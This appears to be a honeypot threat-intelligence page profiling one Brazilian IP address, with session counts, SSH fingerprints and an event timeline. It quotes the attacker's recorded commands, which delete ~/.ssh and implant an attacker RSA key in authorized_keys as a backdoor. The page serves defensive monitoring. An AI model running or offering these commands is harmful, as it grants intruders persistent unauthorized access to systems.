← Back to feed
189.8.5.118
Location
🇧🇷 BR / Franco da Rocha
ASN
AS26609 · Universal Telecom S.A.
Cloud Provider
—
Total Events
251
Top 10% by volume
Agent Count
1
First / Last Seen
2026-04-11 14:00 — 2026-04-11 14:25
Attack Types
MITRE ATT&CK Techniques
Initial Access
Defense Evasion
Command and Control
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
Sessions
39 (14 with login)
Avg Depth Score
0.49
Commands Executed
21
Files Downloaded
7
Notable Commands
- cd ~; chattr -ia .ssh; lockr -ia .ssh
- lockr -ia .ssh
- cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
HASSH
SSH Client
Evidence Timeline
Credential Harvester
393a665a8496
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
e89024196a80
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
cbb47a504b69
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
dab31bc51e76
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
f05032620cfe
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
2eb4fcc19ec1
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
dfc233ef2cc3
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
8451af831ff3
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
94e27a8be911
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
3cf541029dbe
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
55b3f7282a0f
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
9dc67551ce18
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
1d94dac0ca3d
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
034fcee41220
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
0b72c1b7fef3
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
23f625a5a191
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
6b01560462d9
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
d6b0b63d5454
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
ffc2d8e05746
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
2929e8596c27
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
175c67f6bfd8
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
42bd4b909ccf
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
8a6b86cdd035
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
c7d762d58aa4
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
46e93672f640
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Opportunistic Bruter
0ed431c550d2
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
5d2fa0bdcf95
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Credential Harvester
8a30a2e93ce4
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
61ef98ce5dc9
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
00607e988ac7
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
4aa398d296aa
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Opportunistic Bruter
eacbd278a091
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
5a5138f9a33b
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Credential Harvester
c964f8f74a38
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
7e3266a89788
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
d261523f23bd
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
a1e642591223
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
2e6aff4277c6
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
c4a1adabe147
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1